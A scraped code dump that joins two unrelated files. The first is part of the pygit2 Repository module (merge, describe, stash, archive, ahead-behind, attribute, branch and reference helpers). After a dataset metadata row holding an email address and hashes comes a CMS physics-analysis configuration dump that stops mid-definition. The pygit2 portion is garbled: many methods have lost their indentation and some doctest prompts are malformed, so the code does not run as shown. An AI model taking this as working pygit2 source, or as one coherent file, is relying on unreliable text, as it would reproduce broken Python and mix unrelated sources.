* minimal. Take extra time to find minimal diff
"""
ancestor_ptr = ffi.new('git_tree **')
ours_ptr = ffi.new('git_tree **')
theirs_ptr = ffi.new('git_tree **')
cindex = ffi.new('git_index **')
if isinstance(ancestor, (str, Oid)):
ancestor = self[ancestor]
if isinstance(ours, (str, Oid)):
ours = self[ours]
if isinstance(theirs, (str, Oid)):
theirs = self[theirs]
ancestor = ancestor.peel(Tree)
ours = ours.peel(Tree)
theirs = theirs.peel(Tree)
opts = self._merge_options(favor, flags, file_flags)
ffi.buffer(ancestor_ptr)[:] = ancestor._pointer[:]
ffi.buffer(ours_ptr)[:] = ours._pointer[:]
ffi.buffer(theirs_ptr)[:] = theirs._pointer[:]
err = C.git_merge_trees(cindex, self._repo, ancestor_ptr[0], ours_ptr[0], theirs_ptr[0], opts)
check_error(err)
return Index.from_c(self, cindex)
#
# Describe
#
    def describe(self, committish=None, max_candidates_tags=None,
                 describe_strategy=None, pattern=None,
                 only_follow_first_parent=None,
                 show_commit_oid_as_fallback=None, abbreviated_size=None,
                 always_use_long_format=None, dirty_suffix=None):
        """
        Describe a commit-ish or the current working tree.

        Returns: The description (str).

        Parameters:

        committish : `str`, :class:`~.Reference`, or :class:`~.Commit`
            Commit-ish object or object name to describe, or `None` to
            describe the current working tree.

        max_candidates_tags : int
            The number of candidate tags to consider. Increasing above 10
            will take slightly longer but may produce a more accurate
            result. A value of 0 will cause only exact matches to be output.

        describe_strategy : int
            Can be one of:

            * `GIT_DESCRIBE_DEFAULT` - Only match annotated tags. (This is
              equivalent to setting this parameter to `None`.)
            * `GIT_DESCRIBE_TAGS` - Match everything under refs/tags/
              (includes lightweight tags).
            * `GIT_DESCRIBE_ALL` - Match everything under refs/ (includes
              branches).

        pattern : str
            Only consider tags matching the given `glob(7)` pattern,
            excluding the "refs/tags/" prefix.

        only_follow_first_parent : bool
            Follow only the first parent commit upon seeing a merge commit.

        show_commit_oid_as_fallback : bool
            Show uniquely abbreviated commit object as fallback.

        abbreviated_size : int
            The minimum number of hexadecimal digits to show for abbreviated
            object names. A value of 0 will suppress long format, only
            showing the closest tag.

        always_use_long_format : bool
            Always output the long format (the nearest tag, the number of
            commits, and the abbrevated commit name) even when the
            committish matches a tag.

        dirty_suffix : str
            A string to append if the working tree is dirty.

        Example::

            repo.describe(pattern='public/*', dirty_suffix='-dirty')
        """
        options = ffi.new('git_describe_options *')
        C.git_describe_init_options(options, C.GIT_DESCRIBE_OPTIONS_VERSION)

        if max_candidates_tags is not None:
            options.max_candidates_tags = max_candidates_tags
        if describe_strategy is not None:
            options.describe_strategy = describe_strategy
        if pattern:
            # The returned pointer object has ownership on the allocated
            # memory. Make sure it is kept alive until git_describe_commit() or
            # git_describe_workdir() are called below.
            pattern_char = ffi.new('char[]', to_bytes(pattern))
            options.pattern = pattern_char
        if only_follow_first_parent is not None:
            options.only_follow_first_parent = only_follow_first_parent
        if show_commit_oid_as_fallback is not None:
            options.show_commit_oid_as_fallback = show_commit_oid_as_fallback

        result = ffi.new('git_describe_result **')
        if committish:
            # Resolve strings to objects, then peel to a commit and hand its
            # raw git_object pointer to libgit2.
            if isinstance(committish, str):
                committish = self.revparse_single(committish)

            commit = committish.peel(Commit)

            cptr = ffi.new('git_object **')
            ffi.buffer(cptr)[:] = commit._pointer[:]

            err = C.git_describe_commit(result, cptr[0], options)
        else:
            err = C.git_describe_workdir(result, self._repo, options)
        check_error(err)

        try:
            format_options = ffi.new('git_describe_format_options *')
            C.git_describe_init_format_options(format_options, C.GIT_DESCRIBE_FORMAT_OPTIONS_VERSION)

            if abbreviated_size is not None:
                format_options.abbreviated_size = abbreviated_size
            if always_use_long_format is not None:
                format_options.always_use_long_format = always_use_long_format
            # dirty_ptr is intentionally kept in a local: format_options
            # borrows the pointer, so the allocation must outlive the
            # git_describe_format() call below.
            dirty_ptr = None
            if dirty_suffix:
                dirty_ptr = ffi.new('char[]', to_bytes(dirty_suffix))
                format_options.dirty_suffix = dirty_ptr

            buf = ffi.new('git_buf *', (ffi.NULL, 0))

            err = C.git_describe_format(buf, result[0], format_options)
            check_error(err)

            try:
                return ffi.string(buf.ptr).decode('utf-8')
            finally:
                C.git_buf_dispose(buf)
        finally:
            C.git_describe_result_free(result[0])
#
# Stash
#
    def stash(self, stasher, message=None, keep_index=False,
              include_untracked=False, include_ignored=False):
        """
        Save changes to the working directory to the stash.

        Returns: The Oid of the stash merge commit (Oid).

        Parameters:

        stasher : Signature
            The identity of the person doing the stashing.

        message : str
            An optional description of stashed state.

        keep_index : bool
            Leave changes already added to the index in the working
            directory.

        include_untracked : bool
            Also stash untracked files.

        include_ignored : bool
            Also stash ignored files.

        Example::

            >>> repo = pygit2.Repository('.')
            >>> repo.stash(repo.default_signature, 'WIP: stashing')
        """
        if message:
            stash_msg = ffi.new('char[]', to_bytes(message))
        else:
            stash_msg = ffi.NULL

        # bool * FLAG is FLAG when True and 0 when False.
        flags = 0
        flags |= keep_index * C.GIT_STASH_KEEP_INDEX
        flags |= include_untracked * C.GIT_STASH_INCLUDE_UNTRACKED
        flags |= include_ignored * C.GIT_STASH_INCLUDE_IGNORED

        stasher_cptr = ffi.new('git_signature **')
        ffi.buffer(stasher_cptr)[:] = stasher._pointer[:]

        coid = ffi.new('git_oid *')
        err = C.git_stash_save(coid, self._repo, stasher_cptr[0], stash_msg, flags)
        check_error(err)

        return Oid(raw=bytes(ffi.buffer(coid)[:]))
    @staticmethod
    def _stash_args_to_options(reinstate_index=False, **kwargs):
        """Build a 'git_stash_apply_options *' from keyword arguments.

        Checkout-related kwargs are forwarded to
        _checkout_args_to_options().
        """
        stash_opts = ffi.new('git_stash_apply_options *')
        check_error(C.git_stash_apply_init_options(stash_opts, 1))

        flags = reinstate_index * C.GIT_STASH_APPLY_REINSTATE_INDEX
        stash_opts.flags = flags

        # NOTE(review): 'refs' is the keep-alive list for ffi allocations
        # that copts borrows pointers into; it is dropped when this function
        # returns while the struct copy below retains those raw pointers.
        # Looks like a potential use-after-free when 'directory' or 'paths'
        # are passed — confirm and consider returning 'refs' to the caller.
        copts, refs = Repository._checkout_args_to_options(**kwargs)
        stash_opts.checkout_options = copts[0]

        return stash_opts
    def stash_apply(self, index=0, **kwargs):
        """
        Apply a stashed state in the stash list to the working directory.

        Parameters:

        index : int
            The position within the stash list of the stash to apply. 0 is
            the most recent stash.

        reinstate_index : bool
            Try to reinstate stashed changes to the index.

        The checkout options may be customized using the same arguments
        taken by Repository.checkout().

        Example::

            >>> repo = pygit2.Repository('.')
            >>> repo.stash(repo.default_signature, 'WIP: stashing')
            >>> repo.stash_apply(strategy=GIT_CHECKOUT_ALLOW_CONFLICTS)
        """
        stash_opts = Repository._stash_args_to_options(**kwargs)
        check_error(C.git_stash_apply(self._repo, index, stash_opts))
def stash_drop(self, index=0):
"""
Remove a stashed state from the stash list.
Parameters:
index : int
The position within the stash list of the stash to remove. 0 is
the most recent stash.
"""
check_error(C.git_stash_drop(self._repo, index))
def stash_pop(self, index=0, **kwargs):
"""Apply a stashed state and remove it from the stash list.
For arguments, see Repository.stash_apply().
"""
stash_opts = Repository._stash_args_to_options(**kwargs)
check_error(C.git_stash_pop(self._repo, index, stash_opts))
#
# Utility for writing a tree into an archive
#
def write_archive(self, treeish, archive, timestamp=None, prefix=''):
"""
Write treeish into an archive.
If no timestamp is provided and 'treeish' is a commit, its committer
timestamp will be used. Otherwise the current time will be used.
All path names in the archive are added to 'prefix', which defaults to
an empty string.
Parameters:
treeish
The treeish to write.
archive
An archive from the 'tarfile' module.
timestamp
Timestamp to use for the files in the archive.
prefix
Extra prefix to add to the path names in the archive.
Example::
>>> import tarfile, pygit2
>>>> with tarfile.open('foo.tar', 'w') as archive:
>>>> repo = pygit2.Repository('.')
>>>> repo.write_archive(repo.head.target, archive)
"""
# Try to get a tree form whatever we got
if isinstance(treeish, Tree):
tree = treeish
if isinstance(treeish, (str, Oid)):
treeish = self[treeish]
# if we don't have a timestamp, try to get it from a commit
if not timestamp:
try:
commit = treeish.peel(Commit)
timestamp = commit.committer.time
except Exception:
pass
# as a last resort, use the current timestamp
if not timestamp:
timestamp = int(time())
tree = treeish.peel(Tree)
index = Index()
index.read_tree(tree)
for entry in index:
content = self[entry.id].read_raw()
info = tarfile.TarInfo(prefix + entry.path)
info.size = len(content)
info.mtime = timestamp
info.uname = info.gname = 'root' # just because git does this
if entry.mode == GIT_FILEMODE_LINK:
info.type = tarfile.SYMTYPE
info.linkname = content.decode("utf-8")
info.mode = 0o777 # symlinks get placeholder
info.size = 0
archive.addfile(info)
else:
info.mode = tree[entry.path].filemode
archive.addfile(info, BytesIO(content))
#
# Ahead-behind, which mostly lives on its own namespace
#
    def ahead_behind(self, local, upstream):
        """
        Calculate how many different commits are in the non-common parts of
        the history between the two given ids.

        Ahead is how many commits are in the ancestry of the 'local' commit
        which are not in the 'upstream' commit. Behind is the opposite.

        Returns: a tuple of two integers with the number of commits ahead
        and behind respectively.

        Parameters:

        local
            The commit which is considered the local or current state.

        upstream
            The commit which is considered the upstream.
        """
        # Normalize non-Oid inputs (e.g. hex strings) through expand_id.
        if not isinstance(local, Oid):
            local = self.expand_id(local)

        if not isinstance(upstream, Oid):
            upstream = self.expand_id(upstream)

        ahead, behind = ffi.new('size_t*'), ffi.new('size_t*')
        oid1, oid2 = ffi.new('git_oid *'), ffi.new('git_oid *')
        ffi.buffer(oid1)[:] = local.raw[:]
        ffi.buffer(oid2)[:] = upstream.raw[:]
        err = C.git_graph_ahead_behind(ahead, behind, self._repo, oid1, oid2)
        check_error(err)

        return int(ahead[0]), int(behind[0])
#
# Git attributes
#
def get_attr(self, path, name, flags=0):
"""
Retrieve an attribute for a file by path.
Returns: a boolean, None if the value is unspecified, or string with
the value of the attribute.
Parameters:
path
The path of the file to look up attributes for, relative to the
workdir root.
name
The name of the attribute to look up.
flags
A combination of GIT_ATTR_CHECK_ flags which determine the
lookup order.
"""
cvalue = ffi.new('char **')
err = C.git_attr_get(cvalue, self._repo, flags, to_bytes(path), to_bytes(name))
check_error(err)
# Now let's see if we can figure out what the value is
attr_kind = C.git_attr_value(cvalue[0])
if attr_kind == C.GIT_ATTR_UNSPECIFIED_T:
return None
elif attr_kind == C.GIT_ATTR_TRUE_T:
return True
elif attr_kind == C.GIT_ATTR_FALSE_T:
return False
elif attr_kind == C.GIT_ATTR_VALUE_T:
return ffi.string(cvalue[0]).decode('utf-8')
assert False, "the attribute value from libgit2 is invalid"
#
# Identity for reference operations
#
@property
def ident(self):
cname = ffi.new('char **')
cemail = ffi.new('char **')
err = C.git_repository_ident(cname, cemail, self._repo)
check_error(err)
return (ffi.string(cname).decode('utf-8'), ffi.string(cemail).decode('utf-8'))
def set_ident(self, name, email):
"""Set the identity to be used for reference operations
Updates to some references also append data to their
reflog. You can use this method to set what identity will be
used. If none is set, it will be read from the configuration.
"""
err = C.git_repository_set_ident(self._repo, to_bytes(name), to_bytes(email))
check_error(err)
    def revert_commit(self, revert_commit, our_commit, mainline=0):
        """
        Reverts the given Commit against the given "our" Commit, producing
        an Index that reflects the result of the revert.

        Returns: an Index with the result of the revert.

        Parameters:

        revert_commit
            The Commit to revert.

        our_commit
            The Commit to revert against (eg, HEAD).

        mainline
            The parent of the revert Commit, if it is a merge (i.e. 1, 2).
        """
        cindex = ffi.new('git_index **')
        revert_commit_ptr = ffi.new('git_commit **')
        our_commit_ptr = ffi.new('git_commit **')

        # Hand the raw git_commit pointers to libgit2.
        ffi.buffer(revert_commit_ptr)[:] = revert_commit._pointer[:]
        ffi.buffer(our_commit_ptr)[:] = our_commit._pointer[:]

        # Default-initialized merge options (no favor/flag overrides).
        opts = ffi.new('git_merge_options *')
        err = C.git_merge_init_options(opts, C.GIT_MERGE_OPTIONS_VERSION)
        check_error(err)

        err = C.git_revert_commit(
            cindex, self._repo, revert_commit_ptr[0], our_commit_ptr[0], mainline, opts
        )
        check_error(err)

        return Index.from_c(self, cindex)
class Branches:
    """Mapping-like accessor over a repository's branches.

    'flag' selects local, remote or all branches; when 'commit' is given,
    only branches whose tip is that commit or a descendant of it are
    visible. For GIT_BRANCH_ALL, 'local' and 'remote' sub-accessors are
    exposed as attributes.
    """

    def __init__(self, repository, flag=GIT_BRANCH_ALL, commit=None):
        self._repository = repository
        self._flag = flag
        if commit is not None:
            # Normalize Commit objects and short ids down to an Oid.
            if isinstance(commit, Commit):
                commit = commit.id
            elif not isinstance(commit, Oid):
                commit = self._repository.expand_id(commit)
        self._commit = commit

        if flag == GIT_BRANCH_ALL:
            self.local = Branches(repository, flag=GIT_BRANCH_LOCAL, commit=commit)
            self.remote = Branches(repository, flag=GIT_BRANCH_REMOTE, commit=commit)

    def __getitem__(self, name):
        found = None
        # Local branches shadow remote ones when both flags are set.
        for kind in (GIT_BRANCH_LOCAL, GIT_BRANCH_REMOTE):
            if found is None and self._flag & kind:
                found = self._repository.lookup_branch(name, kind)

        if found is None or not self._valid(found):
            raise KeyError('Branch not found: {}'.format(name))
        return found

    def get(self, key):
        """Like __getitem__, but return None instead of raising KeyError."""
        try:
            return self[key]
        except KeyError:
            return None

    def __iter__(self):
        names = self._repository.listall_branches(self._flag)
        if self._commit is None:
            yield from names
        else:
            for name in names:
                # Re-resolve through get() to apply the commit filter.
                if self.get(name) is not None:
                    yield name

    def create(self, name, commit, force=False):
        return self._repository.create_branch(name, commit, force)

    def delete(self, name):
        self[name].delete()

    def _valid(self, branch):
        """Return True when *branch* passes the optional commit filter."""
        if branch.type == GIT_REF_SYMBOLIC:
            branch = branch.resolve()
        if self._commit is None:
            return True
        return (branch.target == self._commit
                or self._repository.descendant_of(branch.target, self._commit))

    def with_commit(self, commit):
        """Return a copy of this accessor restricted to *commit*."""
        assert self._commit is None
        return Branches(self._repository, self._flag, commit)

    def __contains__(self, name):
        return self.get(name) is not None
class References:
    """Mapping-like accessor over a repository's references."""

    def __init__(self, repository):
        self._repository = repository

    def __getitem__(self, name):
        return self._repository.lookup_reference(name)

    def get(self, key):
        """Like __getitem__, but return None instead of raising KeyError."""
        try:
            return self[key]
        except KeyError:
            return None

    def __iter__(self):
        yield from self._repository.listall_references()

    def create(self, name, target, force=False):
        return self._repository.create_reference(name, target, force)

    def delete(self, name):
        self[name].delete()

    def __contains__(self, name):
        return self.get(name) is not None

    @property
    def objects(self):
        """All references as Reference objects."""
        return self._repository.listall_reference_objects()

    def compress(self):
        """Pack loose references into the packed-refs file."""
        return self._repository.compress_references()
class Repository(BaseRepository):
    """Concrete repository backed by an on-disk git directory."""

    def __init__(self, *args, **kwargs):
        # When a path is given as the first positional argument, open it
        # through the file backend; otherwise defer entirely to the base
        # class (used e.g. by _from_c below).
        if len(args) != 0:
            path = args[0]
            args = args[1:]

            # Accept os.PathLike and bytes paths as well as str.
            if hasattr(path, "__fspath__"):
                path = path.__fspath__()
            if not isinstance(path, str):
                path = path.decode('utf-8')
            path_backend = init_file_backend(path)
            super().__init__(path_backend, *args, **kwargs)
        else:
            super().__init__(*args, **kwargs)

    @classmethod
    def _from_c(cls, ptr, owned):
        """Wrap an existing 'git_repository *' (cffi) in a Repository.

        'owned' tells the base class whether this wrapper should free the
        C repository when collected.
        """
        cptr = ffi.new('git_repository **')
        cptr[0] = ptr
        # Bypass __init__ (which expects a path) and feed the raw pointer
        # bytes straight to the base class initializer.
        repo = cls.__new__(cls)
        super(cls, repo)._from_c(bytes(ffi.buffer(cptr)[:]), owned)
        repo._common_init()
        return repo
| [
"veerankisalmanraj@gmail.com"
] | veerankisalmanraj@gmail.com |
f2fdbcd6bc145b6ac96878bd70741c1cf8492916 | c99988740dfd759e999f40a942c3d7d290188e6d | /HeavyIonsAnalysis/TrackAnalysis/python/crab_20200921_073540/inputs/PSetDump.py | 35fa94ca931bc0e0510d388145724c23987461af | [] | no_license | yszhang95/miniAOD_tree_production | e6fa5fc77eb26006061e5558bc5eae0842ef2591 | 3b33454e6fd17eecb576f9a92545ff917684d170 | refs/heads/master | 2022-12-31T00:36:56.716163 | 2020-10-19T18:00:25 | 2020-10-19T18:00:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31,315 | py | import FWCore.ParameterSet.Config as cms
process = cms.Process("Analysis")
process.source = cms.Source("PoolSource",
duplicateCheckMode = cms.untracked.string('noDuplicateCheck'),
fileNames = cms.untracked.vstring('/store/group/phys_heavyions/FECEF784-7DCA-984D-AF75-1991ACA0747A.root')
)
process.HFRecalParameterBlock = cms.PSet(
HFdepthOneParameterA = cms.vdouble(
0.004123, 0.00602, 0.008201, 0.010489, 0.013379,
0.016997, 0.021464, 0.027371, 0.034195, 0.044807,
0.058939, 0.125497
),
HFdepthOneParameterB = cms.vdouble(
-4e-06, -2e-06, 0.0, 4e-06, 1.5e-05,
2.6e-05, 6.3e-05, 8.4e-05, 0.00016, 0.000107,
0.000425, 0.000209
),
HFdepthTwoParameterA = cms.vdouble(
0.002861, 0.004168, 0.0064, 0.008388, 0.011601,
0.014425, 0.018633, 0.023232, 0.028274, 0.035447,
0.051579, 0.086593
),
HFdepthTwoParameterB = cms.vdouble(
-2e-06, -0.0, -7e-06, -6e-06, -2e-06,
1e-06, 1.9e-05, 3.1e-05, 6.7e-05, 1.2e-05,
0.000157, -3e-06
)
)
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
process.randomEngineStateProducer = cms.EDProducer("RandomEngineStateProducer")
process.hlt = cms.EDFilter("HLTHighLevel",
HLTPaths = cms.vstring('HLT_PFJet500*'),
TriggerResultsTag = cms.InputTag("TriggerResults","","HLT"),
andOr = cms.bool(True),
eventSetupPathsKey = cms.string(''),
throw = cms.bool(False)
)
process.analyzer = cms.EDAnalyzer("TrackAnalyzer",
beamSpotSrc = cms.untracked.InputTag("offlineBeamSpot"),
doTrack = cms.untracked.bool(True),
jets2 = cms.InputTag("slimmedJetsPuppi"),
lostTracksSrc = cms.InputTag("lostTracks"),
packedCandSrc = cms.InputTag("packedPFCandidates"),
trackPtMin = cms.untracked.double(0.01),
vertexSrc = cms.InputTag("offlineSlimmedPrimaryVertices")
)
process.DQMStore = cms.Service("DQMStore",
LSbasedMode = cms.untracked.bool(False),
collateHistograms = cms.untracked.bool(False),
enableMultiThread = cms.untracked.bool(False),
forceResetOnBeginLumi = cms.untracked.bool(False),
referenceFileName = cms.untracked.string(''),
saveByLumi = cms.untracked.bool(False),
verbose = cms.untracked.int32(0),
verboseQT = cms.untracked.int32(0)
)
process.MessageLogger = cms.Service("MessageLogger",
FrameworkJobReport = cms.untracked.PSet(
FwkJob = cms.untracked.PSet(
limit = cms.untracked.int32(10000000),
optionalPSet = cms.untracked.bool(True)
),
default = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
optionalPSet = cms.untracked.bool(True)
),
categories = cms.untracked.vstring(
'FwkJob',
'FwkReport',
'FwkSummary',
'Root_NoDictionary'
),
cerr = cms.untracked.PSet(
FwkJob = cms.untracked.PSet(
limit = cms.untracked.int32(0),
optionalPSet = cms.untracked.bool(True)
),
FwkReport = cms.untracked.PSet(
limit = cms.untracked.int32(10000000),
optionalPSet = cms.untracked.bool(True),
reportEvery = cms.untracked.int32(1)
),
FwkSummary = cms.untracked.PSet(
limit = cms.untracked.int32(10000000),
optionalPSet = cms.untracked.bool(True),
reportEvery = cms.untracked.int32(1)
),
INFO = cms.untracked.PSet(
limit = cms.untracked.int32(0)
),
Root_NoDictionary = cms.untracked.PSet(
limit = cms.untracked.int32(0),
optionalPSet = cms.untracked.bool(True)
),
default = cms.untracked.PSet(
limit = cms.untracked.int32(10000000)
),
noTimeStamps = cms.untracked.bool(False),
optionalPSet = cms.untracked.bool(True),
threshold = cms.untracked.string('INFO')
),
cerr_stats = cms.untracked.PSet(
optionalPSet = cms.untracked.bool(True),
output = cms.untracked.string('cerr'),
threshold = cms.untracked.string('WARNING')
),
cout = cms.untracked.PSet(
placeholder = cms.untracked.bool(True)
),
debugModules = cms.untracked.vstring(),
debugs = cms.untracked.PSet(
placeholder = cms.untracked.bool(True)
),
default = cms.untracked.PSet(
),
destinations = cms.untracked.vstring(
'warnings',
'errors',
'infos',
'debugs',
'cout',
'cerr'
),
errors = cms.untracked.PSet(
placeholder = cms.untracked.bool(True)
),
fwkJobReports = cms.untracked.vstring('FrameworkJobReport'),
infos = cms.untracked.PSet(
Root_NoDictionary = cms.untracked.PSet(
limit = cms.untracked.int32(0),
optionalPSet = cms.untracked.bool(True)
),
optionalPSet = cms.untracked.bool(True),
placeholder = cms.untracked.bool(True)
),
statistics = cms.untracked.vstring('cerr_stats'),
suppressDebug = cms.untracked.vstring(),
suppressInfo = cms.untracked.vstring(),
suppressWarning = cms.untracked.vstring(),
warnings = cms.untracked.PSet(
placeholder = cms.untracked.bool(True)
)
)
process.RandomNumberGeneratorService = cms.Service("RandomNumberGeneratorService",
CTPPSFastRecHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1357987)
),
LHCTransport = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(87654321)
),
MuonSimHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(987346)
),
VtxSmeared = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(98765432)
),
ecalPreshowerRecHit = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(6541321)
),
ecalRecHit = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(654321)
),
externalLHEProducer = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(234567)
),
famosPileUp = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
fastSimProducer = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(13579)
),
fastTrackerRecHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(24680)
),
g4SimHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(11)
),
generator = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(123456789)
),
hbhereco = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(541321)
),
hfreco = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(541321)
),
hiSignal = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(123456789)
),
hiSignalG4SimHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(11)
),
hiSignalLHCTransport = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(88776655)
),
horeco = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(541321)
),
l1ParamMuons = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(6453209)
),
mix = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(12345)
),
mixData = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(12345)
),
mixGenPU = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
mixRecoTracks = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
mixSimCaloHits = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(918273)
),
paramMuons = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(54525)
),
saveFileName = cms.untracked.string(''),
simBeamSpotFilter = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(87654321)
),
simMuonCSCDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(11223344)
),
simMuonDTDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
),
simMuonRPCDigis = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
),
simSiStripDigiSimLink = cms.PSet(
engineName = cms.untracked.string('MixMaxRng'),
initialSeed = cms.untracked.uint32(1234567)
)
)
process.TFileService = cms.Service("TFileService",
fileName = cms.string('output_UL_C_ak4.root')
)
process.CSCGeometryESModule = cms.ESProducer("CSCGeometryESModule",
alignmentsLabel = cms.string(''),
appendToDataLabel = cms.string(''),
applyAlignment = cms.bool(True),
debugV = cms.untracked.bool(False),
useCentreTIOffsets = cms.bool(False),
useDDD = cms.bool(False),
useGangedStripsInME1a = cms.bool(True),
useOnlyWiresInME1a = cms.bool(False),
useRealWireGeometry = cms.bool(True)
)
process.CaloGeometryBuilder = cms.ESProducer("CaloGeometryBuilder",
SelectedCalos = cms.vstring(
'HCAL',
'ZDC',
'CASTOR',
'EcalBarrel',
'EcalEndcap',
'EcalPreshower',
'TOWER'
)
)
process.CaloTopologyBuilder = cms.ESProducer("CaloTopologyBuilder")
process.CaloTowerGeometryFromDBEP = cms.ESProducer("CaloTowerGeometryFromDBEP",
applyAlignment = cms.bool(False)
)
process.CaloTowerTopologyEP = cms.ESProducer("CaloTowerTopologyEP")
process.CastorDbProducer = cms.ESProducer("CastorDbProducer",
appendToDataLabel = cms.string('')
)
process.CastorGeometryFromDBEP = cms.ESProducer("CastorGeometryFromDBEP",
applyAlignment = cms.bool(False)
)
process.DTGeometryESModule = cms.ESProducer("DTGeometryESModule",
alignmentsLabel = cms.string(''),
appendToDataLabel = cms.string(''),
applyAlignment = cms.bool(True),
fromDDD = cms.bool(False)
)
process.EcalBarrelGeometryFromDBEP = cms.ESProducer("EcalBarrelGeometryFromDBEP",
applyAlignment = cms.bool(True)
)
process.EcalElectronicsMappingBuilder = cms.ESProducer("EcalElectronicsMappingBuilder")
process.EcalEndcapGeometryFromDBEP = cms.ESProducer("EcalEndcapGeometryFromDBEP",
applyAlignment = cms.bool(True)
)
process.EcalLaserCorrectionService = cms.ESProducer("EcalLaserCorrectionService")
process.EcalPreshowerGeometryFromDBEP = cms.ESProducer("EcalPreshowerGeometryFromDBEP",
applyAlignment = cms.bool(True)
)
process.EcalTrigTowerConstituentsMapBuilder = cms.ESProducer("EcalTrigTowerConstituentsMapBuilder",
MapFile = cms.untracked.string('Geometry/EcalMapping/data/EndCap_TTMap.txt')
)
process.GlobalTrackingGeometryESProducer = cms.ESProducer("GlobalTrackingGeometryESProducer")
process.HcalAlignmentEP = cms.ESProducer("HcalAlignmentEP")
process.HcalGeometryFromDBEP = cms.ESProducer("HcalGeometryFromDBEP",
applyAlignment = cms.bool(True)
)
process.MuonDetLayerGeometryESProducer = cms.ESProducer("MuonDetLayerGeometryESProducer")
process.MuonNumberingInitialization = cms.ESProducer("MuonNumberingInitialization")
process.ParabolicParametrizedMagneticFieldProducer = cms.ESProducer("AutoParametrizedMagneticFieldProducer",
label = cms.untracked.string('ParabolicMf'),
valueOverride = cms.int32(18268),
version = cms.string('Parabolic')
)
process.RPCGeometryESModule = cms.ESProducer("RPCGeometryESModule",
compatibiltyWith11 = cms.untracked.bool(True),
useDDD = cms.untracked.bool(False)
)
process.SiStripRecHitMatcherESProducer = cms.ESProducer("SiStripRecHitMatcherESProducer",
ComponentName = cms.string('StandardMatcher'),
NSigmaInside = cms.double(3.0),
PreFilter = cms.bool(False)
)
process.StripCPEfromTrackAngleESProducer = cms.ESProducer("StripCPEESProducer",
ComponentName = cms.string('StripCPEfromTrackAngle'),
ComponentType = cms.string('StripCPEfromTrackAngle'),
parameters = cms.PSet(
mLC_P0 = cms.double(-0.326),
mLC_P1 = cms.double(0.618),
mLC_P2 = cms.double(0.3),
mTEC_P0 = cms.double(-1.885),
mTEC_P1 = cms.double(0.471),
mTIB_P0 = cms.double(-0.742),
mTIB_P1 = cms.double(0.202),
mTID_P0 = cms.double(-1.427),
mTID_P1 = cms.double(0.433),
mTOB_P0 = cms.double(-1.026),
mTOB_P1 = cms.double(0.253),
maxChgOneMIP = cms.double(6000.0),
useLegacyError = cms.bool(False)
)
)
process.TrackerRecoGeometryESProducer = cms.ESProducer("TrackerRecoGeometryESProducer")
process.VolumeBasedMagneticFieldESProducer = cms.ESProducer("VolumeBasedMagneticFieldESProducerFromDB",
debugBuilder = cms.untracked.bool(False),
label = cms.untracked.string(''),
valueOverride = cms.int32(18268)
)
process.XMLFromDBSource = cms.ESProducer("XMLIdealGeometryESProducer",
label = cms.string('Extended'),
rootDDName = cms.string('cms:OCMS')
)
process.ZdcGeometryFromDBEP = cms.ESProducer("ZdcGeometryFromDBEP",
applyAlignment = cms.bool(False)
)
process.fakeForIdealAlignment = cms.ESProducer("FakeAlignmentProducer",
appendToDataLabel = cms.string('fakeForIdeal')
)
process.hcalDDDRecConstants = cms.ESProducer("HcalDDDRecConstantsESModule",
appendToDataLabel = cms.string('')
)
process.hcalDDDSimConstants = cms.ESProducer("HcalDDDSimConstantsESModule",
appendToDataLabel = cms.string('')
)
process.hcalTopologyIdeal = cms.ESProducer("HcalTopologyIdealEP",
Exclude = cms.untracked.string(''),
MergePosition = cms.untracked.bool(False),
appendToDataLabel = cms.string('')
)
process.hcal_db_producer = cms.ESProducer("HcalDbProducer",
dump = cms.untracked.vstring(''),
file = cms.untracked.string('')
)
process.idealForDigiCSCGeometry = cms.ESProducer("CSCGeometryESModule",
